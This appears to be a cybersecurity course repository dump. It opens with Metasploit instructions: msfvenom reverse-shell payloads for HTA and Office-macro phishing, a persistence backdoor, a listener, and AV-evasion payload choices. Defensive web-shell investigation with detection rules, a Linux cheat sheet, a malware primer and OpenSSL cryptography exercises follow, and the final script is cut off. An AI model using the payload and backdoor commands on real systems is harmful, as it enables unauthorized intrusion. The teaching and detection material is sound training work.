98 | 99 | ### **HTA (HTML Application) Payload** 100 | ``` 101 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -f hta-psh > exploit.hta 102 | ``` 103 | Delivered via phishing or social engineering. 104 | 105 | --- 106 | 107 | ## **6. Macro-Based Payload (For Office Documents)** 108 | ``` 109 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -f vba > macro.txt 110 | ``` 111 | Insert the macro into a Microsoft Office document. 112 | 113 | --- 114 | 115 | ## **7. Persistent Backdoor** 116 | To maintain access, use: 117 | ``` 118 | run persistence -U -i 5 -p 4444 -r 119 | ``` 120 | - **`-U`**: Runs at user login. 121 | - **`-i 5`**: Reconnects every 5 seconds. 122 | - **`-p 4444`**: Uses port 4444. 123 | 124 | --- 125 | 126 | ## **8. Listening for Connections (Handler)** 127 | After generating the payload, set up the **Metasploit listener**: 128 | ``` 129 | use exploit/multi/handler 130 | set payload windows/meterpreter/reverse_tcp 131 | set LHOST 132 | set LPORT 4444 133 | set ExitOnSession false 134 | exploit -j 135 | ``` 136 | 137 | --- 138 | 139 | ### **Which One Should You Use?** 140 | - **Windows 7 (no AV):** `windows/meterpreter/reverse_tcp` 141 | - **Windows 7 (with AV):** Encoded payload or `reverse_https` 142 | - **Windows 8 (firewalled):** `reverse_http` or `reverse_https` 143 | - **Stealthy attack:** PowerShell payloads or macro-based payloads 144 | -------------------------------------------------------------------------------- /projects/network_analysis.md: -------------------------------------------------------------------------------- 1 | ### 🚨 **Network Analysis – Web Shell (Local to Local Port Scanning Alert)** 🚨 2 | 3 | This scenario describes a **Local-to-Local Port Scanning** alert in a **Security Information and Event Management (SIEM)** system. 
It indicates that an internal private IP address is scanning another internal system, which could be a sign of **malware activity, lateral movement, or an attacker using a web shell** inside the network.

---

## 🕵️‍♂️ **Breaking It Down: What Happened?**
1️⃣ **SIEM Alert: "Local to Local Port Scanning"**
- The **source IP** (internal private address) is scanning ports on another internal system.
- Normally, internal machines don't scan each other unless it's for legitimate administrative tasks (e.g., vulnerability scanning by IT teams).

2️⃣ **Possible Web Shell Activity**
- A **web shell** is a malicious script that attackers place on a compromised web server.
- The attacker might be using the web shell to execute **commands, scan the network**, and move laterally.

3️⃣ **Why is this Suspicious?**
- **Normal users don't run port scans.**
- A web shell often lets attackers control an internal system **remotely via HTTP/HTTPS**.
- If the system hosting the web shell has been compromised, it could be used to **probe other machines for vulnerabilities**.

---

## 🔎 **Step 1: Investigate the Alert**
### 📌 **A. Identify the Source & Destination IPs**
Check **SIEM logs** to find:
- **Source IP** → The internal system initiating the scan.
- **Destination IP** → The system being scanned.
- **Ports Scanned** → Is the scanning targeting specific services (e.g., SSH, RDP, SMB)?

👉 Run a **Splunk or Kibana query** to pull logs:
```spl
index=firewall OR index=network_traffic sourcetype=suricata
| where event=="port_scan"
| table _time, src_ip, dst_ip, dst_port, action
```
👉 If you have Zeek logs, use the `conn.log` field names (`id.orig_h`, `id.resp_h`, `id.resp_p`; dotted names are single-quoted inside `where`):
```spl
index=zeek sourcetype=conn
| where 'id.orig_h'=="attacker_internal_IP"
| stats count by id.resp_h, id.resp_p
```

---

### 📌 **B. 
Check for Web Shell Activity**
1️⃣ Look for **web server logs** on the suspected machine:
```bash
sudo grep "cmd=" /var/log/apache2/access.log
sudo grep "wget" /var/log/nginx/access.log
```
2️⃣ Check if any PHP, ASPX, or JSP scripts were uploaded:
```bash
# files under the web root modified in the last 2 days
find /var/www/html -type f -mtime -2
```
3️⃣ Investigate unusual HTTP requests (e.g., `/uploads/shell.php?cmd=id`).

---

## 🔥 **Step 2: Containment & Mitigation**
✅ **1. Isolate the Affected Machine**
- Block its network traffic using a firewall rule:
```bash
sudo iptables -A INPUT -s -j DROP
```
- If it's a Windows machine, remove it from the domain.

✅ **2. Search for Known Web Shells**
Run `ClamAV` or `YARA` to detect web shells:
```bash
clamscan -r /var/www/html
yara -r webshell_rules.yar /var/www/html
```

✅ **3. Check for Reverse Shell Connections**
If an attacker has a backdoor:
```bash
sudo netstat -anp | grep ":4444"
```

✅ **4. Reset Credentials**
- If the attacker gained access through weak credentials, enforce **password resets**.

---

## 🎯 **Step 3: Implement Detection & Prevention**
### 🔍 **A. Set Up SIEM Rules for Port Scanning**
- **Rule Logic**: Detect multiple connection attempts from a single internal IP in a short time frame.
- Example in Splunk (count *distinct* destination ports per source and minute; counting rows per `src_ip, dst_port` pair would flag repeated connections to one port, not a scan):
```spl
index=network sourcetype=suricata
| bin _time span=1m
| stats dc(dst_port) as ports by _time, src_ip
| where ports > 10
```
- Example in Suricata (every rule needs a `sid`; the values below are placeholders from the local-rule range):
```
# alert once per source when 10 or more packets arrive within 60 seconds
alert ip any any -> any any (msg:"Possible Internal Port Scan"; threshold: type both, track by_src, count 10, seconds 60; sid:1000001; rev:1;)
```
- Configure Suricata to drop scanning traffic (only takes effect in inline/IPS mode; keep the same threshold, because an unqualified `drop ip any any -> any any` matches every packet):
```
drop ip any any -> any any (msg:"Detected Internal Port Scan"; threshold: type both, track by_src, count 10, seconds 60; sid:1000002; rev:1;)
```

### 🔍 **B. 
Enable Web Shell Detection in WAF** 104 | - If using AWS WAF, add **Web Shell Detection Rules**: 105 | ```json 106 | { 107 | "Statement": { 108 | "ByteMatchStatement": { 109 | "SearchString": "cmd=", 110 | "FieldToMatch": {"QueryString": {}}, 111 | "TextTransformations": [{"Type": "URL_DECODE"}] 112 | } 113 | } 114 | } 115 | ``` 116 | 117 | --- 118 | 119 | ## ✅ **Conclusion** 120 | 🚀 **This case indicates a possible attacker using a web shell to scan the network.** 121 | 🔎 **Your goal as an analyst is to:** 122 | 1. **Identify** the attacker and affected machine. 123 | 2. **Contain** and remove the web shell. 124 | 3. **Investigate** whether they gained access to other systems. 125 | 4. **Harden security** to prevent future attacks. 126 | -------------------------------------------------------------------------------- /week3/day2_report.md: -------------------------------------------------------------------------------- 1 | Linux command-line tasks can range from basic file management to advanced scripting and automation. Below are some essential Linux command-line tasks categorized by functionality. 2 | 3 | --- 4 | 5 | ## **1. 
File and Directory Management** 6 | ### **Create, List, and Navigate Directories** 7 | | Command | Description | 8 | |---------|------------| 9 | | `ls` | List files in a directory | 10 | | `ls -la` | List all files, including hidden ones, with details | 11 | | `mkdir newdir` | Create a new directory | 12 | | `cd newdir` | Change to the `newdir` directory | 13 | | `pwd` | Show the current working directory | 14 | | `rmdir emptydir` | Remove an empty directory | 15 | 16 | ### **Create, Delete, and Copy Files** 17 | | Command | Description | 18 | |---------|------------| 19 | | `touch file.txt` | Create an empty file | 20 | | `rm file.txt` | Remove a file | 21 | | `rm -rf directory` | Force delete a directory and its contents | 22 | | `cp file1.txt file2.txt` | Copy file1.txt to file2.txt | 23 | | `mv oldname.txt newname.txt` | Rename or move a file | 24 | 25 | --- 26 | 27 | ## **2. File Content Viewing and Editing** 28 | | Command | Description | 29 | |---------|------------| 30 | | `cat file.txt` | View file contents | 31 | | `less file.txt` | View a file page by page | 32 | | `head -n 10 file.txt` | Show the first 10 lines of a file | 33 | | `tail -n 10 file.txt` | Show the last 10 lines of a file | 34 | | `nano file.txt` | Edit a file using Nano | 35 | | `vim file.txt` | Edit a file using Vim | 36 | 37 | --- 38 | 39 | ## **3. File Permissions and Ownership** 40 | | Command | Description | 41 | |---------|------------| 42 | | `ls -l` | View file permissions | 43 | | `chmod 755 script.sh` | Change file permissions (`rwxr-xr-x`) | 44 | | `chown user:group file.txt` | Change file ownership | 45 | | `sudo` | Execute a command as root | 46 | 47 | ### **Understanding Permissions** 48 | - `r` (read), `w` (write), `x` (execute) 49 | - Example: `chmod 644 file.txt` (Owner: `rw-`, Group: `r--`, Others: `r--`) 50 | 51 | --- 52 | 53 | ## **4. 
Process and Resource Management** 54 | | Command | Description | 55 | |---------|------------| 56 | | `ps aux` | Show running processes | 57 | | `top` | Display system resource usage | 58 | | `kill PID` | Kill a process by its PID | 59 | | `pkill processname` | Kill a process by name | 60 | | `htop` | Interactive process viewer (if installed) | 61 | 62 | --- 63 | 64 | ## **5. User Management** 65 | | Command | Description | 66 | |---------|------------| 67 | | `whoami` | Show current user | 68 | | `id` | Display user ID and group ID | 69 | | `adduser newuser` | Add a new user | 70 | | `passwd newuser` | Change a user's password | 71 | | `usermod -aG sudo newuser` | Grant sudo privileges | 72 | 73 | --- 74 | 75 | ## **6. Networking** 76 | | Command | Description | 77 | |---------|------------| 78 | | `ping google.com` | Check internet connectivity | 79 | | `ifconfig` or `ip a` | Show network interfaces | 80 | | `curl example.com` | Fetch content from a URL | 81 | | `wget file_url` | Download a file | 82 | | `netstat -tulnp` | Show open ports | 83 | 84 | --- 85 | 86 | ## **7. Disk Management** 87 | | Command | Description | 88 | |---------|------------| 89 | | `df -h` | Show disk usage | 90 | | `du -sh folder/` | Show folder size | 91 | | `mount /dev/sdb1 /mnt` | Mount a disk | 92 | | `umount /mnt` | Unmount a disk | 93 | 94 | --- 95 | 96 | ## **8. Searching and Finding Files** 97 | | Command | Description | 98 | |---------|------------| 99 | | `find / -name "file.txt"` | Search for a file by name | 100 | | `grep "error" logfile.txt` | Search for "error" in a file | 101 | | `grep -r "keyword" /var/log/` | Search recursively in a directory | 102 | 103 | --- 104 | 105 | ## **9. 
Archiving and Compression** 106 | | Command | Description | 107 | |---------|------------| 108 | | `tar -cvf archive.tar folder/` | Create a tar archive | 109 | | `tar -xvf archive.tar` | Extract a tar archive | 110 | | `zip -r archive.zip folder/` | Create a zip file | 111 | | `unzip archive.zip` | Extract a zip file | 112 | 113 | --- 114 | 115 | ## **10. Scripting and Automation** 116 | ### **Basic Shell Script** 117 | Create a simple script (`myscript.sh`): 118 | ```bash 119 | #!/bin/bash 120 | echo "Hello, Linux!" 121 | date 122 | ``` 123 | Make it executable: 124 | ```bash 125 | chmod +x myscript.sh 126 | ./myscript.sh 127 | ``` 128 | 129 | --- 130 | 131 | ## **11. System Information** 132 | | Command | Description | 133 | |---------|------------| 134 | | `uname -a` | Show kernel information | 135 | | `uptime` | Display system uptime | 136 | | `free -m` | Show memory usage | 137 | | `df -h` | Show disk usage | 138 | 139 | --- 140 | 141 | ### **Bonus: One-Liner Productivity Commands** 142 | 1. **Find and delete files larger than 100MB:** 143 | ```bash 144 | find /path/to/dir -size +100M -delete 145 | ``` 146 | 2. **Monitor a log file in real-time:** 147 | ```bash 148 | tail -f /var/log/syslog 149 | ``` 150 | 3. **Find top 10 largest files:** 151 | ```bash 152 | du -ah / | sort -rh | head -n 10 153 | ``` 154 | 155 | --- 156 | -------------------------------------------------------------------------------- /projects/malware.md: -------------------------------------------------------------------------------- 1 | **Module 1: Introduction to Malware** for your course. 2 | 3 | --- 4 | 5 | # 🏗 **Module 1: Introduction to Malware** 6 | 7 | ## 🎯 **Learning Objectives:** 8 | By the end of this module, students will: 9 | ✅ Understand different **types of malware** and how they work. 10 | ✅ Learn about **attack vectors** used to deliver malware. 11 | ✅ Analyze **real-world malware cases** like WannaCry, Stuxnet, and Pegasus. 
12 | ✅ Perform **basic malware analysis** using public repositories. 13 | 14 | --- 15 | 16 | ## 📌 **1.1 What is Malware?** 17 | 🔹 **Definition**: Malware (Malicious Software) is a program designed to disrupt, damage, or gain unauthorized access to a computer system. 18 | 🔹 **Goals of Malware**: 19 | - **Steal Data** (Banking Trojans, Keyloggers) 20 | - **Cause Disruptions** (Worms, Ransomware) 21 | - **Gain Unauthorized Access** (Rootkits, RATs) 22 | - **Spy on Users** (Spyware, Pegasus) 23 | 24 | --- 25 | 26 | ## 📌 **1.2 Types of Malware** 27 | 28 | | Malware Type | Description | Real-World Example | 29 | |--------------|------------|--------------------| 30 | | **Trojan** | Disguised as legitimate software but executes malicious code. | Zeus Trojan (Banking malware) | 31 | | **Worm** | Self-replicates and spreads across networks. | WannaCry (Exploited SMBv1 vulnerability) | 32 | | **Ransomware** | Encrypts user files and demands payment. | Locky, REvil, WannaCry | 33 | | **Keylogger** | Records keystrokes to steal credentials. | Hawkeye Keylogger | 34 | | **Rootkit** | Hides malware presence from OS and security tools. | Stuxnet (Kernel-mode rootkit) | 35 | | **Spyware** | Secretly gathers user information. | Pegasus (Spyware used by governments) | 36 | | **Adware** | Unwanted ads, redirects users to malicious sites. | Fireball Adware | 37 | 38 | --- 39 | 40 | ## 📌 **1.3 Common Attack Vectors** 41 | 42 | Malware is delivered through different methods, including: 43 | 44 | ### 📨 **Phishing Attacks** 45 | 🔹 Fake emails with malicious attachments or links. 46 | 🔹 Example: **Emotet malware** spreads through phishing emails. 47 | 48 | ### 💻 **Exploits & Vulnerabilities** 49 | 🔹 Attackers exploit software flaws (**Zero-days, RCEs, Buffer Overflows**). 50 | 🔹 Example: **EternalBlue exploit** used by WannaCry. 51 | 52 | ### 🌐 **Drive-by Downloads** 53 | 🔹 Malicious scripts automatically download malware when a user visits an infected website. 
54 | 🔹 Example: **Angler Exploit Kit** used to spread ransomware. 55 | 56 | ### 👥 **Social Engineering** 57 | 🔹 Tricking users into **installing malware** (e.g., Fake software updates). 58 | 🔹 Example: **Tech support scams** convincing users to download RATs. 59 | 60 | --- 61 | 62 | ## 📌 **1.4 Malware in the Real World: Case Studies** 63 | 64 | ### 🦠 **Case Study 1: WannaCry Ransomware (2017)** 65 | 🔹 Exploited **EternalBlue SMBv1 vulnerability**. 66 | 🔹 **Infected 230,000+ computers** in over 150 countries. 67 | 🔹 **Ransom demand**: $300–$600 in Bitcoin. 68 | 🔹 **Mitigation**: **Patch SMBv1 (MS17-010)** and disable unnecessary services. 69 | 70 | ### 🏭 **Case Study 2: Stuxnet Worm (2010)** 71 | 🔹 First-ever **cyber weapon** targeting **Iran’s nuclear program**. 72 | 🔹 Spread via **USB drives** and infected **SCADA systems**. 73 | 🔹 Used **Zero-day exploits** and **rootkit techniques**. 74 | 🔹 **Impact**: Damaged **centrifuges** in Natanz, Iran. 75 | 76 | ### 📱 **Case Study 3: Pegasus Spyware** 77 | 🔹 Developed by **NSO Group** for **government surveillance**. 78 | 🔹 Exploits **zero-click vulnerabilities** in WhatsApp and iMessage. 79 | 🔹 Can **record calls, steal messages, track GPS, and control the camera**. 80 | 🔹 Found in **journalists' and activists' phones** worldwide. 81 | 82 | --- 83 | 84 | ## 🛠 **Hands-on Lab: Basic Malware Report Analysis** 85 | 86 | ### 🎯 **Objective:** 87 | Students will analyze **real-world malware samples** from online repositories. 88 | 89 | ### **Step 1: Open Public Malware Repositories** 90 | ✅ [VirusTotal](https://www.virustotal.com/) - Check malware hashes and scans. 91 | ✅ [Hybrid Analysis](https://www.hybrid-analysis.com/) - Detailed behavior analysis. 92 | ✅ [ANY.RUN](https://any.run/) - Interactive malware sandbox. 93 | 94 | ### **Step 2: Analyze a Known Malware Sample** 95 | 1️⃣ Search for "**WannaCry sample hash**" in VirusTotal. 96 | 2️⃣ View **static analysis** (PE file info, signatures, YARA matches). 
97 | 3️⃣ Check **dynamic behavior** (API calls, network requests). 98 | 99 | ### **Step 3: Identify Indicators of Compromise (IoCs)** 100 | 🔍 Hashes (SHA256, MD5) 101 | 🔍 IP Addresses & Domains used by malware 102 | 🔍 File system modifications 103 | 104 | --- 105 | 106 | ## ✅ **Key Takeaways** 107 | ✔ **Malware types and attack methods** are diverse. 108 | ✔ **Case studies** show how malware evolves over time. 109 | ✔ **Hands-on analysis** helps understand malware behavior. 110 | 111 | --- 112 | 113 | ### 📌 **Next Module: Setting Up a Safe Malware Lab** 114 | 🔹 Install **REMnux, FLARE-VM, and Cuckoo Sandbox**. 115 | 🔹 Configure a **safe, isolated VM** for testing malware. 116 | -------------------------------------------------------------------------------- /week1/cryptgraphic.md: -------------------------------------------------------------------------------- 1 | ### **Week 5: Cryptography Basics - Explanation and Activities** 2 | 3 | Cryptography is an essential part of cybersecurity, used to secure communication, protect sensitive data, and ensure authenticity. Let's break down the core topics and activities for this week. 4 | 5 | --- 6 | 7 | ## **🔹 Topics:** 8 | 9 | ### **1️⃣ What is Cryptography?** 10 | Cryptography is the science of securing information by transforming it into an unreadable format. It ensures **confidentiality, integrity, authentication,** and **non-repudiation** of data. 11 | 12 | 🔹 **Key Objectives of Cryptography:** 13 | - **Confidentiality:** Keeps data private (e.g., encrypted messages). 14 | - **Integrity:** Ensures data is not tampered with (e.g., hashing). 15 | - **Authentication:** Confirms the sender's identity (e.g., digital signatures). 16 | - **Non-repudiation:** Prevents denial of actions (e.g., signed emails). 17 | 18 | --- 19 | 20 | ### **2️⃣ Types of Cryptography: Symmetric vs. Asymmetric** 21 | Cryptography is classified into **symmetric** and **asymmetric** encryption based on how keys are used. 

#### **🔸 Symmetric Encryption (Secret-Key Encryption)**
- Uses **one key** for both encryption and decryption.
- Fast, but both parties must first share the key over a secure channel.
- Example: **AES (Advanced Encryption Standard).**

📌 **Example:**
🔐 Encrypt:
`openssl enc -aes-256-cbc -salt -pbkdf2 -in file.txt -out file.enc -k secretkey`

🔓 Decrypt:
`openssl enc -aes-256-cbc -d -pbkdf2 -in file.enc -out file_decrypted.txt -k secretkey`

Two caveats before using this outside a lab. `-k` puts the password on the command line, where it is visible in `ps` output and shell history; prefer `-pass file:` or `-pass env:`. And CBC mode provides no integrity: a modified ciphertext still decrypts "successfully" to altered plaintext, so a MAC or signature over the ciphertext is needed. `-pbkdf2` is added above because without it OpenSSL derives the key with its legacy single-iteration scheme, which makes password guessing very fast.

#### **🔹 Asymmetric Encryption (Public-Key Encryption)**
- Uses **two keys** that form a pair:
  - **Public Key (for encryption)**, which can be handed to anyone.
  - **Private Key (for decryption)**, which never leaves its owner.
- Much slower than symmetric encryption and limited to small inputs (a 2048-bit RSA key can encrypt fewer than 256 bytes), so in practice it is used to exchange or wrap a symmetric key that then encrypts the data (hybrid encryption). It is not "more secure" than symmetric encryption; it solves the key-distribution problem.
- Example: **RSA (Rivest-Shamir-Adleman).**

📌 **Example:**
🔐 Encrypt using a public key:
`openssl pkeyutl -encrypt -pubin -inkey public.pem -in file.txt -out file.enc -pkeyopt rsa_padding_mode:oaep`

🔓 Decrypt using a private key:
`openssl pkeyutl -decrypt -inkey private.pem -in file.enc -out file_decrypted.txt -pkeyopt rsa_padding_mode:oaep`

`openssl rsautl` is deprecated since OpenSSL 3.0 and defaults to PKCS#1 v1.5 padding, which has known padding-oracle attacks; `pkeyutl` with OAEP padding is its replacement.

---

### **3️⃣ Hashing and Encryption**
🔹 **Encryption:** Converts plaintext into ciphertext; **reversible** by anyone holding the key.
🔹 **Hashing:** Converts input of any length into a fixed-length digest; **one-way** (no key, cannot be reversed), and any change to the input changes the digest.

#### **🔸 Hashing Algorithms (Used for Integrity)**
- **MD5 (Message Digest Algorithm 5)** → 128-bit digest. Collisions can be generated at will; do not use it for integrity checks or signatures.
- **SHA-256 (Secure Hash Algorithm, 256-bit)** → current standard, widely used.

📌 **Example:**
Generate SHA-256 hash of a file:
`sha256sum file.txt`

Verify a file's integrity by comparing the digest with the value the source published over a separate, trusted channel (the vendor's HTTPS page or a signed release note). A hash served next to the download on the same server proves nothing, since whoever replaced the file could replace the hash too.

---

### **4️⃣ Public Key Infrastructure (PKI)**
PKI is the system of certificate authorities, digital certificates, and key pairs that lets parties who have never met trust each other's public keys, for example every time a browser connects to an HTTPS site.

🔹 **Key Components:**
- **Certificate Authority (CA):** Verifies identities and issues (signs) digital certificates.
- **Public/Private Key Pair:** The certificate binds an identity to the public key; the private key stays with its owner.
- **Digital Signatures:** The CA's signature on a certificate is what lets a client verify that the certificate is genuine.
- **SSL/TLS:** The protocol that uses these certificates to secure HTTPS connections (SSL is the obsolete predecessor; current sites use TLS 1.2 or 1.3).

🔹 **How it Works:**
1. The website operator generates a key pair and sends a certificate signing request (containing the public key, never the private key) to a CA.
2. The CA verifies that the requester controls the domain and issues a digital certificate signed with the CA's private key.
3. The certificate binds the website's name to its public key.
4. When a user visits the site, the browser checks that the certificate chains to a CA it trusts, that the name matches, and that it has not expired or been revoked; during the TLS handshake the server proves it holds the matching private key. The session keys that encrypt the traffic are agreed with an ephemeral Diffie-Hellman exchange (ECDHE); the certificate's public key authenticates the server rather than encrypting the data.

---

## **🛠 Activities: Hands-on Cryptography Exercises**

### **1️⃣ Encrypt and Decrypt Files Using OpenSSL**
**Symmetric Encryption (AES-256):**
```bash
# Encrypt a file (-pbkdf2: proper key stretching; -salt: fresh random salt per file).
# -k exposes the password on the command line; use -pass file: outside a lab.
openssl enc -aes-256-cbc -salt -pbkdf2 -in secret.txt -out secret.enc -k MyStrongPassword

# Decrypt the file (the same options must be given or a different key is derived)
openssl enc -aes-256-cbc -d -pbkdf2 -in secret.enc -out secret_decrypted.txt -k MyStrongPassword
```

**Asymmetric Encryption (RSA):**
```bash
# Generate RSA key pair (explicit 2048-bit size; the private key is written unencrypted,
# so restrict its permissions)
openssl genpkey -algorithm RSA -pkeyopt rsa_keygen_bits:2048 -out private.pem
chmod 600 private.pem
openssl rsa -pubout -in private.pem -out public.pem

# Encrypt a small file (a key or short message, not a document) with the public key, OAEP padding
openssl pkeyutl -encrypt -pubin -inkey public.pem -in message.txt -out message.enc -pkeyopt rsa_padding_mode:oaep

# Decrypt the file using the private key
openssl pkeyutl -decrypt -inkey private.pem -in message.enc -out message_decrypted.txt -pkeyopt rsa_padding_mode:oaep
```

---

### **2️⃣ Create and Verify Digital Signatures**
**Step 1: Create a Private and Public Key**
```bash
openssl genpkey -algorithm RSA -pkeyopt rsa_keygen_bits:2048 -out private_key.pem
openssl rsa -pubout -in private_key.pem -out public_key.pem
```

**Step 2: Sign a File**
```bash
# Hash document.txt with SHA-256 and sign the digest with the private key
openssl dgst -sha256 -sign private_key.pem -out signature.bin document.txt
```

**Step 3: Verify the Signature**
```bash
# Prints "Verified OK" (exit status 0) or "Verification Failure" (exit status 1),
# so the command can gate a script
openssl dgst -sha256 -verify public_key.pem -signature signature.bin document.txt
```

🔹 If the document is modified, even by a single byte, verification fails, which gives **integrity**; because only the holder of the private key could have produced the signature, it also gives **authentication** and **non-repudiation**.
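The script below is an added example (mine, not part of the course page) that makes the two caveats on the `openssl enc` command in the symmetric-encryption section concrete. It runs the page's bare AES-256-CBC command, flips one ciphertext byte and shows that decryption still exits 0 with altered plaintext; it then wraps the same operation in PBKDF2 key stretching, a password file instead of `-k`, and an HMAC-SHA256 over the ciphertext (encrypt-then-MAC) that refuses the tampered file. Everything in it is assumed or constructed: the temp directory, the password `secretkey`, the sample plaintext, the labelled-hash MAC-key derivation in `mac_key`, and the `PBKDF2_ITER` value. It assumes OpenSSL 1.1.1 or later and a POSIX userland (`od`, `dd`, `awk`, `cmp`).

```shell
#!/usr/bin/env bash
# Added example (not from the course page): the bare `openssl enc -aes-256-cbc`
# command is malleable; an encrypt-then-MAC wrapper detects tampering.
set -eu

PBKDF2_ITER=200000   # lab value; OWASP currently suggests 600000 for PBKDF2-HMAC-SHA256

# mac_key PASSFILE: derive a MAC key that differs from the encryption key.
# Demo simplification: a labelled SHA-256 of the password. Real code would run
# one PBKDF2/HKDF and split its output into an encryption key and a MAC key.
mac_key() {
    printf 'mac-key:%s' "$(cat "$1")" | openssl dgst -sha256 | awk '{print $NF}'
}

# hmac_of KEY FILE: hex HMAC-SHA256 of FILE. The key travels in argv here,
# which `ps` can see; acceptable in a lab VM, not on a shared host.
hmac_of() {
    openssl dgst -sha256 -hmac "$1" "$2" | awk '{print $NF}'
}

# enc_authenticated IN OUT PASSFILE: AES-256-CBC with PBKDF2 stretching and the
# password read from a file (not argv); OUT.mac holds the HMAC of the ciphertext.
enc_authenticated() {
    openssl enc -aes-256-cbc -salt -pbkdf2 -iter "$PBKDF2_ITER" \
        -pass "file:$3" -in "$1" -out "$2"
    hmac_of "$(mac_key "$3")" "$2" > "$2.mac"
}

# dec_authenticated IN OUT PASSFILE: check the MAC first, decrypt only if it
# matches. Returns 1 and writes nothing if the ciphertext was modified.
# (The string compare is not constant-time; a library MAC verify would be.)
dec_authenticated() {
    if [ "$(hmac_of "$(mac_key "$3")" "$1")" != "$(cat "$1.mac")" ]; then
        echo "MAC mismatch on $1: ciphertext modified, refusing to decrypt" >&2
        return 1
    fi
    openssl enc -d -aes-256-cbc -pbkdf2 -iter "$PBKDF2_ITER" \
        -pass "file:$3" -in "$1" -out "$2"
}

# flip_byte FILE OFFSET: XOR the byte at OFFSET with 0x01 (an attacker's edit).
flip_byte() {
    b=$(od -An -tu1 -j "$2" -N 1 "$1" | tr -d ' ')
    printf "\\$(printf '%03o' $((b ^ 1)))" |
        dd of="$1" bs=1 seek="$2" count=1 conv=notrunc 2>/dev/null
}

# demo: returns 0 when both observations hold:
#   (a) the page's bare command decrypts a tampered file with exit status 0,
#   (b) the authenticated wrapper rejects the same tampering.
demo() {
    d=$(mktemp -d)
    printf 'secretkey\n' > "$d/pass"                                      # constructed password
    printf 'The quick brown fox jumps over the lazy dog\n' > "$d/plain"  # 44 bytes = 3 CBC blocks

    # (a) the page's command: no PBKDF2, password on argv, no MAC
    openssl enc -aes-256-cbc -salt -in "$d/plain" -out "$d/bare.enc" -k secretkey 2>/dev/null
    flip_byte "$d/bare.enc" 16   # first ciphertext byte after the 16-byte "Salted__"+salt header
    if openssl enc -aes-256-cbc -d -in "$d/bare.enc" -out "$d/bare.dec" -k secretkey 2>/dev/null; then
        bare_ok=1                # decryption "succeeded": padding on the last block is intact
    else
        bare_ok=0
    fi
    if cmp -s "$d/plain" "$d/bare.dec"; then bare_changed=0; else bare_changed=1; fi

    # (b) the hardened wrapper
    enc_authenticated "$d/plain" "$d/auth.enc" "$d/pass"
    dec_authenticated "$d/auth.enc" "$d/auth.dec" "$d/pass"
    cmp -s "$d/plain" "$d/auth.dec"                     # round-trips before tampering
    flip_byte "$d/auth.enc" 16
    if dec_authenticated "$d/auth.enc" "$d/auth2.dec" "$d/pass" 2>/dev/null; then
        auth_rejected=0
    else
        auth_rejected=1
    fi
    rm -rf "$d"
    echo "bare_decrypt_exit_ok=$bare_ok bare_plaintext_changed=$bare_changed authenticated_rejected=$auth_rejected"
    [ "$bare_ok" = 1 ] && [ "$bare_changed" = 1 ] && [ "$auth_rejected" = 1 ]
}

demo
```

Note that `openssl enc` has no AEAD mode (`-aes-256-gcm` is rejected with "AEAD ciphers not supported"), which is why the integrity check has to be bolted on as a separate HMAC when working from the CLI; a library call to AES-GCM or ChaCha20-Poly1305 gives the same property in one step.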
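The next script is also an added example (mine, not the page's) for the asymmetric-encryption and digital-signature sections. It shows the input-size limit that makes direct RSA encryption of a document fail, the hybrid pattern that wraps a random AES key with RSA-OAEP through `openssl pkeyutl`, and signature verification used as a pass/fail check that catches a one-byte change. The 300-byte message, the temp directory and the function names are constructed for the example; it assumes OpenSSL 1.1.1 or later.

```shell
#!/usr/bin/env bash
# Added example (not from the course page): RSA-OAEP with `openssl pkeyutl`,
# why hybrid encryption is needed, and signature verification as a verdict.
set -eu

gen_rsa_keypair() {   # gen_rsa_keypair DIR -> DIR/private.pem, DIR/public.pem
    openssl genpkey -algorithm RSA -pkeyopt rsa_keygen_bits:2048 \
        -out "$1/private.pem" 2>/dev/null
    openssl rsa -in "$1/private.pem" -pubout -out "$1/public.pem" 2>/dev/null
}

# RSA-OAEP (SHA-256). The exit status is openssl's: encrypting more than the
# key allows (190 bytes for RSA-2048 with OAEP-SHA256) fails.
rsa_oaep_encrypt() {  # rsa_oaep_encrypt PUBKEY IN OUT
    openssl pkeyutl -encrypt -pubin -inkey "$1" -in "$2" -out "$3" \
        -pkeyopt rsa_padding_mode:oaep -pkeyopt rsa_oaep_md:sha256 2>/dev/null
}
rsa_oaep_decrypt() {  # rsa_oaep_decrypt PRIVKEY IN OUT
    openssl pkeyutl -decrypt -inkey "$1" -in "$2" -out "$3" \
        -pkeyopt rsa_padding_mode:oaep -pkeyopt rsa_oaep_md:sha256 2>/dev/null
}

# Hybrid encryption: a fresh random 256-bit key (64 hex chars) encrypts the
# file with AES-256-CBC; RSA-OAEP wraps only that key. A MAC over the
# ciphertext is still required in real use and is omitted here to keep the
# focus on key wrapping.
hybrid_encrypt() {    # hybrid_encrypt PUBKEY IN OUTDIR -> OUTDIR/data.enc, OUTDIR/key.enc
    openssl rand -hex 32 > "$3/key.txt"
    openssl enc -aes-256-cbc -salt -pbkdf2 -pass "file:$3/key.txt" -in "$2" -out "$3/data.enc"
    rsa_oaep_encrypt "$1" "$3/key.txt" "$3/key.enc"
    rm -f "$3/key.txt"                                  # only the wrapped copy survives
}
hybrid_decrypt() {    # hybrid_decrypt PRIVKEY INDIR OUT
    rsa_oaep_decrypt "$1" "$2/key.enc" "$2/key.txt"
    openssl enc -d -aes-256-cbc -pbkdf2 -pass "file:$2/key.txt" -in "$2/data.enc" -out "$3"
    rm -f "$2/key.txt"
}

# Detached signature over a file. verify_file's exit status is the verdict:
# openssl prints "Verified OK" / "Verification Failure" and exits 0 / 1.
sign_file() {         # sign_file PRIVKEY FILE SIGOUT
    openssl dgst -sha256 -sign "$1" -out "$3" "$2"
}
verify_file() {       # verify_file PUBKEY FILE SIG
    openssl dgst -sha256 -verify "$1" -signature "$3" "$2" >/dev/null 2>&1
}

demo() {
    d=$(mktemp -d)
    gen_rsa_keypair "$d"
    head -c 300 /dev/zero | tr '\0' 'A' > "$d/big.txt"   # constructed 300-byte message

    if rsa_oaep_encrypt "$d/public.pem" "$d/big.txt" "$d/big.enc"; then
        echo "unexpected: RSA accepted a 300-byte input"; rm -rf "$d"; return 1
    fi
    echo "direct RSA-OAEP of 300 bytes fails (data too large for key size): use hybrid"

    hybrid_encrypt "$d/public.pem" "$d/big.txt" "$d"
    hybrid_decrypt "$d/private.pem" "$d" "$d/big.dec"
    cmp -s "$d/big.txt" "$d/big.dec" || { echo "hybrid round-trip failed"; rm -rf "$d"; return 1; }
    echo "hybrid round-trip OK"

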